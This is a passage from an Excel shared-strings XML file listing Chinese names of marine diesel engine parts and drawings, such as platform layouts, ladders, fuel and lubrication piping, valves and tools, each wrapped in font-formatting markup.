        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧走台安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱台阶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推杆轨道防护装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停机泄放阀安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动滑块布置安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停机泄放阀座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯子布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊扶手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮侧平台布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器平台布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧中层支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台布置后端视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮侧中层平台布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮侧下层平台布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧平台布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧上层支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧中层支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧下层支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧俯视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底层平台布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带扶手的梯子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定夹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压联结</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系装配表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块止动块用液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部管接口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纵管件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上层主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧主管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放盒安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵加热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管接头</t>
    </r>
  </si>
  <si>
    <r>
      <t>NC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器泄放</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气进口到燃油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵泄漏系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔板支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油分配管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油合流管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机泄放</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器出口柴油机进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油供应管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油过滤器支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分支管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带执行器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通球阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄油箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形膨胀接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀接头夹环安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护软管插座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柔性软管盖总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体部分管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油分流管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横隔膜安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速控制布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵归零</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管防护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管切削</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管销钉扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统油进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传送齿轮润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制侧柴油机管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧柴油机管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机管总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器润滑油主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
